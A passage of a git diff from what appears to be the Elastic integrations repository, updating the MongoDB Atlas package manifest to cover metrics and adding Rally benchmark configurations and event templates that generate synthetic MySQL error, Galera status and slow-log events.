"7debedbb-89c5-4585-a78e-8b891ddb5d73:indexpattern-datasource-layer-072715a7-2316-42ca-9272-7bac814074e3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e1449935-a76f-46e2-ba55-9b11be523b92:indexpattern-datasource-layer-d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e:indexpattern-datasource-layer-55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "59d5ec89-8838-4419-a1c0-3644f7093ad0:indexpattern-datasource-layer-a63e3a4f-5884-406a-b804-9462f72589c2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2322e519-d472-4a4f-8fa5-adba86fd8eea:indexpattern-datasource-layer-66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbc90d78-1b6b-4650-8840-c89d287cf3ca:indexpattern-datasource-layer-579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/mongodb_atlas/manifest.yml b/packages/mongodb_atlas/manifest.yml index 2cc24dfd283..0d4cdce6d3e 100644 --- a/packages/mongodb_atlas/manifest.yml +++ b/packages/mongodb_atlas/manifest.yml @@ -1,10 +1,10 @@ format_version: 3.0.3 name: mongodb_atlas title: "MongoDB Atlas" -version: 0.0.1 +version: 0.0.2 source: license: "Elastic-2.0" -description: This Elastic integration collects logs from MongoDB Atlas instance. +description: This Elastic integration collects logs and metrics from MongoDB Atlas instance. type: integration categories: - cloud @@ -19,6 +19,10 @@ screenshots: title: MongoDB Atlas Mongod Audit Dashboard size: 600x600 type: image/png + - src: /img/mongodb_atlas-process-dashboard.png + title: MongoDB Atlas Process Metrics Dashboard + size: 600x600 + type: image/png icons: - src: /img/mongodb_atlas-logo.svg title: MongoDB Atlas logo @@ -26,12 +30,12 @@ icons: type: image/svg+xml policy_templates: - name: mongodb_atlas - title: MongoDB Atlas logs - description: Collect MongoDB Atlas logs. + title: MongoDB Atlas logs and metrics + description: Collect MongoDB Atlas logs and metrics. inputs: - type: cel - title: Collect MongoDB Atlas logs - description: Collect MongoDB Atlas logs via API. + title: Collect MongoDB Atlas logs and metrics + description: Collect MongoDB Atlas logs and metrics via API. vars: - name: url type: text diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark.yml b/packages/mysql/_dev/benchmark/rally/error-benchmark.yml new file mode 100644 index 00000000000..723bc3aa124 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/error-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.error events ingested +data_stream: + name: error +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./error-benchmark/template.ndjson + config: + path: ./error-benchmark/config.yml + fields: + path: ./error-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml new file mode 100644 index 00000000000..b3b26cc9c6b --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml @@ -0,0 +1,45 @@ +fields: + - name: 'timestamp' + period: -24h + - name: agent_ephemeral_id + value: 14b8ce9f-49d1-4643-8499-23ae7936ea81 + - name: agent_id + value: 5975706d-e804-462d-b6c0-d70b289d54a7 + - name: agent_name + value: docker-fleet-agent + - name: log_level + enum: ["Note", "Warning", "System", "ERROR"] + - name: message + type: text + - name: thread_id + range: + min: 1 + max: 30 + - name: code + range: + min: 10000 + max: 20000 + - name: message_note + enum: + - "InnoDB: Using Linux native AIO" + - "InnoDB: Mutexes and rw_locks use GCC atomic builtins" + - "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M" + - "Initializing buffer pool, size = 128.0M" + - "Mutexes and rw_locks use GCC atomic builtins" + - name: messsage_warning + enum: + - "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead." + - "root@localhost is created with an empty password ! Please consider switching off the --initialize-insecure option." + - "CA certificate ca.pem is self signed." + - "Insecure configuration for --pid-file: Location '/tmp' in the path is accessible to all OS users. Consider choosing a different directory." + - name: message_system + enum: + - "Received SHUTDOWN from user boot. Shutting down mysqld (Version: 8.0.15)." + - "/usr/sbin/mysqld: Shutdown complete (mysqld 8.0.15) MySQL Community Server - GPL." + - "/usr/sbin/mysqld (mysqld 8.0.15) starting as process 1834" + - name: message_error + enum: + - "/usr/sbin/mysqld: unknown variable '--max-connections=512'" + - "InnoDB: Cannot allocate memory for the buffer pool" + - "Plugin 'InnoDB' init function returned error." + - "Unknown/unsupported storage engine: InnoDB" diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml new file mode 100644 index 00000000000..bf483722466 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml @@ -0,0 +1,22 @@ +- name: agent_ephemeral_id + type: keyword +- name: agent_id + type: keyword +- name: agent_name + type: keyword +- name: log_level + type: keyword +- name: message_note + type: keyword +- name: message_warning + type: keyword +- name: message_error + type: keyword +- name: message_system + type: keyword +- name: timestamp + type: date +- name: thread_id + type: long +- name: code + type: long diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson new file mode 100644 index 00000000000..eefac17b92d --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson @@ -0,0 +1,78 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agent_id := generate "agent_id" }} +{{- $agent_name := generate "agent_name" }} +{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }} +{{- $log_level := generate "log_level" }} +{{- $thread_id := generate "thread_id" }} +{{- $code := generate "code" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "name": "{{ $agent_name }}", + "id": "{{ $agent_id }}", + "type": "filebeat", + "ephemeral_id": "{{ $agent_ephemeral_id }}", + "version": "8.8.0" + }, + "log": { + "file": { + "path": "/tmp/service_logs/error.log" + }, + "offset": 0 + }, + "elastic_agent": { + "id": "{{ $agent_id }}", + "version": "8.8.0", + "snapshot": false + }, + {{- if eq $log_level "Note"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_note" }}", + {{- else if eq $log_level "Warning"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_warning" }}", + {{- else if eq $log_level "System"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_system" }}", + {{- else if eq $log_level "ERROR"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_error" }}", + {{- end}} + "tags": [ + "mysql-error" + ], + "input": { + "type": "log" + }, + "ecs": { + "version": "8.5.1" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "mysql.error" + }, + "host": { + "hostname": "docker-fleet-agent", + "os": { + "kernel": "3.10.0-1160.105.1.el7.x86_64", + "codename": "focal", + "name": "Ubuntu", + "type": "linux", + "family": "debian", + "version": "20.04.6 LTS (Focal Fossa)", + "platform": "ubuntu" + }, + "containerized": true, + "ip": [ + "192.168.244.7" + ], + "name": "docker-fleet-agent", + "id": "11b348d94d79496a84b7330fd69db8f8", + "mac": [ + "02-42-C0-A8-FD-0A" + ], + "architecture": "x86_64" + }, + "event": { + "agent_id_status": "verified", + "timezone": "{{ $timestamp.Format "-07:00" }}", + "dataset": "mysql.error" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml b/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml new file mode 100644 index 00000000000..62d658658ca --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.galera_status events ingested +data_stream: + name: galera_status +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./galerastatus-benchmark/template.ndjson + config: + path: ./galerastatus-benchmark/config.yml + fields: + path: ./galerastatus-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml new file mode 100644 index 00000000000..c290e2e1903 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml @@ -0,0 +1,164 @@ +fields: + - name: timestamp + period: 60m + - name: EventDuration + range: + min: 1 + max: 1000 + - name: agent_id + value: "a6bbda96-646d-4211-bac8-b40bdd093a0c" + - name: service_address + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] + - name: apply_oooe + range: + min: 1 + max: 100 + - name: apply_oool + range: + min: 1 + max: 100 + - name: apply_window + range: + min: 1 + max: 100 + - name: deps_distance + range: + min: 1 + max: 1000 + - name: index_size + range: + min: 1 + max: 100 + - name: interval + range: + min: 0 + max: 100 + - name: conf_id + range: + min: 1 + max: 1000 + - name: cluster_size + range: + min: 1 + max: 20 + - name: cluster_status + enum: ["Primary", "Non-Primary", "Disconnected"] + - name: commit_oooe + range: + min: 1 + max: 100 + - name: commit_window + range: + min: 1 + max: 100 + - name: connected + enum: ["ON", "OFF"] + - name: evs_evict + value: "bd5fe1c3-7d80-11e9-8913-4f209d688a15" + - name: evs_state + value: "OPERATIONAL" + - name: flow_ctl_paused + range: + min: 0 + max: 1000 + - name: flow_ctl_paused_ns + range: + min: 0 + max: 1000 + - name: flow_ctl_recv + range: + min: 0 + max: 1000 + - name: flow_ctl_sent + range: + min: 0 + max: 1000 + - name: last_committed + range: + min: 1000 + max: 30000 + - name: bf_aborts + range: + min: 1 + max: 1000 + - name: cert_failures + range: + min: 0 + max: 100 + - name: commits + range: + min: 0 + max: 10000 + - name: recv_queue + range: + min: 0 + max: 1000 + - name: recv_queue_avg + range: + min: 0 + max: 1000 + - name: recv_queue_max + range: + min: 1001 + max: 10001 + - name: recv_queue_min + range: + min: 0 + max: 100 + - name: replays + range: + min: 0 + max: 1000 + - name: send_queue + range: + min: 0 + max: 1000 + - name: send_queue_avg + range: + min: 1 + max: 1000 + - name: send_queue_max + range: + min: 1001 + max: 10001 + - name: send_queue_min + range: + min: 0 + max: 100 + - name: state + enum: ["Synced", "Joining", "Donor/Desynced", "Joined"] + - name: ready + enum: ["ON", "OFF"] + - name: received_count + range: + min: 1 + max: 1000 + - name: received_bytes + range: + min: 10000 + max: 100000 + - name: data_bytes + range: + min: 10000 + max: 100000 + - name: keys + range: + min: 1 + max: 10000 + - name: keys_bytes + range: + min: 100 + max: 100000 + - name: other_bytes + range: + min: 0 + max: 100000 + - name: count + range: + min: 1 + max: 10000 + - name: bytes + range: + range: + min: 10000 + max: 100000 diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml new file mode 100644 index 00000000000..2d1332232a1 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml @@ -0,0 +1,94 @@ +- name: EventDuration + type: long +- name: agent_ephemeral_id + type: keyword +- name: agent_id + type: keyword +- name: agent_name + type: keyword +- name: timestamp + type: date +- name: service_address + type: keyword +- name: apply_oooe + type: double +- name: apply_oool + type: double +- name: apply_window + type: double +- name: deps_distance + type: double +- name: index_size + type: long +- name: interval + type: double +- name: conf_id + type: long +- name: cluster_size + type: long +- name: cluster_status + type: keyword +- name: commit_oooe + type: double +- name: commit_window + type: long +- name: connected + type: keyword +- name: evs_evict + type: keyword +- name: evs_state + type: keyword +- name: flow_ctl_paused + type: double +- name: flow_ctl_paused_ns + type: long +- name: flow_ctl_recv + type: long +- name: flow_ctl_sent + type: long +- name: last_committed + type: long +- name: bf_aborts + type: long +- name: cert_failures + type: long +- name: commits + type: long +- name: recv_queue + type: long +- name: recv_queue_avg + type: double +- name: recv_queue_max + type: long +- name: recv_queue_min + type: long +- name: replays + type: long +- name: send_queue + type: long +- name: send_queue_avg + type: double +- name: send_queue_max + type: long +- name: send_queue_min + type: long +- name: state + type: keyword +- name: ready + type: keyword +- name: received_count + type: long +- name: received_bytes + type: long +- name: data_bytes + type: long +- name: keys + type: long +- name: keys_bytes + type: long +- name: other_bytes + type: long +- name: count + type: long +- name: bytes + type: long diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson new file mode 100644 index 00000000000..f2a378011e0 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson @@ -0,0 +1,173 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agent_id := generate "agent_id" }} +{{- $agent_name := generate "agent_name" }} +{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }} +{{- $EventDuration := generate "EventDuration" }} +{{- $service_address := generate "service_address" }} +{{- $apply_oooe := generate "apply_oooe" }} +{{- $apply_oool := generate "apply_oool" }} +{{- $apply_window := generate "apply_window" }} +{{- $deps_distance := generate "deps_distance" }} +{{- $index_size := generate "index_size" }} +{{- $interval := generate "interval" }} +{{- $conf_id := generate "conf_id" }} +{{- $cluster_size := generate "cluster_size" }} +{{- $cluster_status := generate "cluster_status" }} +{{- $commit_oooe := generate "commit_oooe" }} +{{- $commit_window := generate "commit_window" }} +{{- $connected := generate "connected" }} +{{- $evs_evict := generate "evs_evict" }} +{{- $evs_state := generate "evs_state" }} +{{- $flow_ctl_paused := generate "flow_ctl_paused" }} +{{- $flow_ctl_paused_ns := generate "flow_ctl_paused_ns" }} +{{- $flow_ctl_recv := generate "flow_ctl_recv" }} +{{- $flow_ctl_sent := generate "flow_ctl_sent" }} +{{- $last_committed := generate "last_committed" }} +{{- $bf_aborts := generate "bf_aborts" }} +{{- $cert_failures := generate "cert_failures" }} +{{- $commits := generate "commits" }} +{{- $recv_queue := generate "recv_queue" }} +{{- $recv_queue_avg := generate "recv_queue_avg" }} +{{- $recv_queue_max := generate "recv_queue_max" }} +{{- $recv_queue_min := generate "recv_queue_min" }} +{{- $replays := generate "replays" }} +{{- $send_queue := generate "send_queue" }} +{{- $send_queue_avg := generate "send_queue_avg" }} +{{- $send_queue_max := generate "send_queue_max" }} +{{- $send_queue_min := generate "send_queue_min" }} +{{- $state := generate "state" }} +{{- $ready := generate "ready" }} +{{- $received_count := generate "received_count" }} +{{- $received_bytes := generate "received_bytes" }} +{{- $data_bytes := generate "data_bytes" }} +{{- $keys := generate "keys" }} +{{- $keys_bytes := generate "keys_bytes" }} +{{- $other_bytes := generate "other_bytes" }} +{{- $count := generate "count" }} +{{- $bytes := generate "bytes" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "{{ $agent_ephemeral_id }}", + "id": "{{ $agent_id }}", + "name": "{{ $agent_name }}", + "type": "metricbeat", + "version": "8.8.0" + }, + "data_stream": { + "dataset": "mysql.galera_status", + "namespace": "ep", + "type": "metrics" + }, + "ecs": { + "version": "8.5.0" + }, + "elastic_agent": { + "id": "{{ $agent_id }}", + "snapshot": false, + "version": "8.8.0" + }, + "event": { + "agent_id_status": "verified", + "dataset": "mysql.galera_status", + "duration": {{ $EventDuration }}, + "module": "mysql" + }, + "host": { + "architecture": "x86_64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "589e678e8f3f457d81e3a530d3ae6011", + "ip": [ + "172.28.0.7" + ], + "mac": [ + "02-42-AC-1C-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "5.10.104-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.5 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "galera_status", + "period": 10000 + }, + "mysql": { + "galera_status": { + "connected": "{{ $connected }}", + "cluster": { + "size": {{ $cluster_size }}, + "conf_id": {{ $conf_id }}, + "status": "{{ $cluster_status }}" + }, + "evs": { + "state": "{{ $evs_state }}", + "evict": "{{ $evs_evict }}" + }, + "apply": { + "oooe": {{ $apply_oooe }}, + "oool": {{ $apply_oool }}, + "window": {{ $apply_window }} + }, + "ready": "{{ $ready }}", + "flow_ctl": { + "paused_ns": {{ $flow_ctl_paused_ns }}, + "paused": {{ $flow_ctl_paused }}, + "recv": {{ $flow_ctl_recv }}, + "sent": {{ $flow_ctl_sent }} + }, + "last_committed": {{ $last_committed }}, + "commit": { + "oooe": {{ $commit_oooe }}, + "window": {{ $commit_window }} + }, + "cert": { + "index_size": {{ $index_size }}, + "deps_distance": {{ $deps_distance }}, + "interval": {{ $interval }} + }, + "received": { + "bytes": {{ $received_bytes }}, + "count": {{ $received_count }} + }, + "repl": { + "bytes": {{ $bytes }}, + "keys": {{ $keys }}, + "keys_bytes": {{ $keys_bytes }}, + "count": {{ $count }}, + "other_bytes": {{ $other_bytes }}, + "data_bytes": {{ $data_bytes }} + }, + "local": { + "replays": {{ $replays }}, + "recv": { + "queue_max": {{ $recv_queue_max }}, + "queue_min": {{ $recv_queue_min }}, + "queue_avg": {{ $recv_queue_avg }}, + "queue": {{ $recv_queue }} + }, + "bf_aborts": {{ $bf_aborts }}, + "commits": {{ $commits }}, + "state": "{{ $state }}", + "cert_failures": {{ $cert_failures }}, + "send": { + "queue_max": {{ $send_queue_max }}, + "queue_min": {{ $send_queue_min }}, + "queue_avg": {{ $send_queue_avg }}, + "queue": {{ $send_queue }} + } + } + } + }, + "service": { + "address": "tcp({{ $service_address }}:3306)/?readTimeout=10s\u0026timeout=10s\u0026writeTimeout=10s", + "type": "mysql" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml index dacdcb301ed..ca46819b19e 100644 --- a/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml +++ b/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml @@ -6,7 +6,7 @@ fields: - name: agent.id value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" - name: service_address - enum: ["elastic-package-service_mysql_1","elastic-package-service_mysql_2","elastic-package-service_mysql_3"] + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] - name: max_timer_wait range: min: 1000000000 diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml new file mode 100644 index 00000000000..9a79d75f3a7 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.slowlog events ingested +data_stream: + name: slowlog +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./slowlog-benchmark/template.ndjson + config: + path: ./slowlog-benchmark/config.yml + fields: + path: ./slowlog-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml new file mode 100644 index 00000000000..e0360717940 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml @@ -0,0 +1,147 @@ +fields: + - name: timestamp + period: -24h # one day + - name: agent.id + value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" + - name: EventDuration + range: + min: 1 + max: 1000 + - name: thread_id + range: + min: 1 + max: 100 + - name: log_slow_rate_type + enum: ["session", "query"] + - name: query_time + range: + min: 0 + max: 10 + - name: lock_time + range: + min: 0 + max: 10 + - name: rows_sent + range: + min: 1 + max: 100 + - name: rows_examined + range: + min: 1000000 + max: 4000000 + - name: rows_affected + range: + min: 1 + max: 100 + - name: last_err_no + range: + min: 0 + max: 100 + - name: killed + range: + min: 0 + max: 100 + - name: bytes_received + range: + min: 0 + max: 3000000 + - name: bytes_sent + range: + min: 0 + max: 3000000 + - name: read_first + range: + min: 0 + max: 100 + - name: read_last + range: + min: 0 + max: 100 + - name: read_key + range: + min: 1000000 + max: 5000000 + - name: read_next + range: + min: 1000000 + max: 5000000 + - name: read_prev + range: + min: 0 + max: 100 + - name: read_rnd + range: + min: 0 + max: 100 + - name: read_rnd_next + range: + min: 0 + max: 1000000 + - name: sort_merge_passes + range: + min: 0 + max: 100 + - name: sort_range_count + range: + min: 0 + max: 100 + - name: sort_rows + range: + min: 0 + max: 100 + - name: sort_scan_count + range: + min: 0 + max: 100 + - name: created_tmp_disk_tables + range: + min: 0 + max: 100 + - name: created_tmp_tables + range: + min: 0 + max: 100 + - name: tmp_table_sizes + range: + min: 1 + max: 100 + - name: innodb_trx_id + range: + min: 1 + max: 100 + - name: merge_passes + range: + min: 1 + max: 100 + - name: innodb_io_r_ops + range: + min: 1 + max: 10000 + - name: innodb_io_r_bytes + range: + min: 10000000 + max: 80000000 + - name: innodb_io_r_wait + range: + min: 0 + max: 10 + - name: innodb_rec_lock_wait + range: + min: 0 + max: 10 + - name: innodb_queue_wait + range: + min: 0 + max: 10 + - name: innodb_pages_distinct + range: + min: 100 + max: 100000 + - name: log_slow_rate_limit + range: + min: 0 + max: 100 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml new file mode 100644 index 00000000000..d8e0b6eb5f8 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml @@ -0,0 +1,86 @@ +- name: agent.ephemeral_id + type: keyword +- name: agent.id + type: keyword +- name: agent.name + type: keyword +- name: EventDuration + type: long +- name: timestamp + type: date +- name: source_domain + type: keyword +- name: source_ip + type: ip +- name: thread_id + type: long +- name: query_time + type: float +- name: lock_time + type: float +- name: rows_sent + type: long +- name: rows_examined + type: long +- name: rows_affected + type: long +- name: last_err_no + type: long +- name: killed + type: long +- name: bytes_received + type: long +- name: bytes_sent + type: long +- name: read_first + type: long +- name: read_last + type: long +- name: read_key + type: long +- name: read_next + type: long +- name: read_prev + type: long +- name: read_rnd + type: long +- name: read_rnd_next + type: long +- name: sort_merge_passes + type: long +- name: sort_range_count + type: long +- name: sort_rows + type: long +- name: sort_scan_count + type: long +- name: created_tmp_disk_tables + type: long +- name: created_tmp_tables + type: long +- name: tmp_table_sizes + type: long +- name: innodb_trx_id + type: long +- name: merge_passes + type: long +- name: innodb_io_r_ops + type: long +- name: innodb_io_r_bytes + type: long +- name: innodb_io_r_wait + type: long +- name: innodb_rec_lock_wait + type: long +- name: innodb_queue_wait + type: long +- name: innodb_pages_distinct + type: long +- name: log_slow_rate_type + type: keyword +- name: log_slow_rate_limit + type: long +- name: duration_start + type: keyword +- name: duration_end + type: keyword diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson new file mode 100644 index 00000000000..0ae848ba44a --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson @@ -0,0 +1,109 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agentId := generate "agent.id" }} +{{- $agentName := generate "agent.name" }} +{{- $agentEphemeralid := generate "agent.ephemeral_id" }} +{{- $eventDuration := generate "EventDuration" }} +{{- $sourceDomain := generate "source_domain" }} +{{- $sourceIp := generate "source_ip" }} +{{- $threadId := generate "thread_id" }} +{{- $queryTime := generate "query_time" }} +{{- $lockTime := generate "lock_time" }} +{{- $rowsSent := generate "rows_sent" }} +{{- $rowsExamined := generate "rows_examined" }} +{{- $rowsAffected := generate "rows_affected" }} +{{- $lastErrNo := generate "last_err_no" }} +{{- $killed := generate "killed" }} +{{- $bytesReceived := generate "bytes_received" }} +{{- $bytesSent := generate "bytes_sent" }} +{{- $readFirst := generate "read_first" }} +{{- $readLast := generate "read_last" }} +{{- $readKey := generate "read_key" }} +{{- $readNext := generate "read_next" }} +{{- $readPrev := generate "read_prev" }} +{{- $readRnd := generate "read_rnd" }} +{{- $readRndNext := generate "read_rnd_next" }} +{{- $sortMergePasses := generate "sort_merge_passes" }} +{{- $sortRangeCount := generate "sort_range_count" }} +{{- $sortRows := generate "sort_rows" }} +{{- $sortScanCount := generate "sort_scan_count" }} +{{- $createdTmpDiskTables := generate "created_tmp_disk_tables" }} +{{- $createdTmpTables := generate "created_tmp_tables" }} +{{- $tmpTableSizes := generate "tmp_table_sizes" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $startTime := generate "timestamp" | date_modify (print $duration_start) }} +{{- $endTime := generate "timestamp" | date_modify (print $duration_end) }} +{{- $innodbTrxId := generate "innodb_trx_id" }} +{{- $mergePasses := generate "merge_passes" }} +{{- $innodbIoROps := generate "innodb_io_r_ops" }} +{{- $innodbIoRBytes := generate "innodb_io_r_bytes" }} +{{- $innodbIoRWait := generate "innodb_io_r_wait" }} +{{- $innodbRecLockWait := generate "innodb_rec_lock_wait" }} +{{- $innodbQueueWait := generate "innodb_queue_wait" }} +{{- $innodbPagesDistinct := generate "innodb_pages_distinct" }} +{{- $logSlowRateType := generate "log_slow_rate_type" }} +{{- $logSlowRateLimit := generate "log_slow_rate_limit" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "name": "{{ $agentName }}", + "id": "{{ $agentId }}", + "type": "filebeat", + "ephemeral_id": "{{ $agentEphemeralid }}", + "version": "8.5.1" + }, + "log": { + "file": { + "path": "/tmp/service_logs/test-mariadb-10-2-12.log" + }, + "offset": 0, + "flags": [ + "multiline" + ] + }, + "elastic_agent": { + "id": "{{ $agentId }}", + "version": "8.5.1", + "snapshot": false + }, + "tags": [ + "mysql-slowlog" + ], + "input": { + "type": "log" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "mysql.slowlog" + }, + "host": { + "hostname": "docker-fleet-agent", + "os": { + "kernel": "3.10.0-1160.102.1.el7.x86_64", + "codename": "focal", + "name": "Ubuntu", + "type": "linux", + "family": "debian", + "version": "20.04.6 LTS (Focal Fossa)", + "platform": "ubuntu" + }, + "containerized": true, + "ip": [ + "172.21.0.7" + ], + "name": "docker-fleet-agent", + "id": "919d5098b9d34b348dd441912f7ad638", + "mac": [ + "02-42-AC-15-00-07" + ], + "architecture": "x86_64" + }, + "message": "# User@Host: root[root] @ {{ $sourceDomain }} [{{ $sourceIp }}] Id: {{ $threadId }}\n# Query_time: {{ $queryTime }} Lock_time: {{ $lockTime }} Rows_sent: {{ $rowsSent }} Rows_examined: {{ $rowsExamined }} Rows_affected: {{ $rowsAffected }} Errno: {{ $lastErrNo }} Killed: {{ $killed }} Bytes_received: {{ $bytesReceived }} Bytes_sent: {{ $bytesSent }} Read_first: {{ $readFirst }} Read_last: {{ $readLast }} Read_key: {{ $readKey }} Read_next: {{ $readNext }} Read_prev: {{ $readPrev }} Read_rnd: {{ $readRnd }} Read_rnd_next: {{ $readRndNext }} Sort_merge_passes: {{ $sortMergePasses }} Sort_range_count: {{ $sortRangeCount }} Sort_rows: {{ $sortRows }} Sort_scan_count: {{ $sortScanCount }} Created_tmp_disk_tables: {{ $createdTmpDiskTables }} Created_tmp_tables: {{ $createdTmpTables }} Tmp_table_sizes: {{ $tmpTableSizes }} Start: {{ $startTime.Format "2006-01-02T15:04:05.000000Z" }} End: {{ $endTime.Format "2006-01-02T15:04:05.000000Z" }} InnoDB_trx_id: {{ $innodbTrxId }} QC_Hit: Yes Full_scan: No Full_join: Yes Tmp_table: Yes Tmp_table_on_disk: No Filesort: Yes Filesort_on_disk: No Merge_passes: {{ $mergePasses }} Priority_queue: No InnoDB_IO_r_ops: {{ $innodbIoROps }} InnoDB_IO_r_bytes: {{ $innodbIoRBytes }} InnoDB_IO_r_wait: {{ $innodbIoRWait }} InnoDB_rec_lock_wait: {{ $innodbRecLockWait }} InnoDB_queue_wait: {{ $innodbQueueWait }} InnoDB_pages_distinct: {{ $innodbPagesDistinct }} Log_slow_rate_type: {{ $logSlowRateType }} Log_slow_rate_limit: {{ $logSlowRateLimit }}\nuse employees;\nSET timestamp={{ $timestamp.Unix }};\nSELECT last_name, MAX(salary) AS salary FROM employees\n INNER JOIN salaries ON employees.emp_no = salaries.emp_no\n GROUP BY last_name\n ORDER BY salary DESC\n LIMIT 10;", + "event": { + "duration": {{ $eventDuration }}, + "agent_id_status": "verified", + "timezone": "{{ $timestamp.Format "-07:00" }}", + "dataset": "mysql.slowlog" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark.yml new file mode 100644 index 00000000000..c235a29a9fa --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.status events ingested +data_stream: + name: 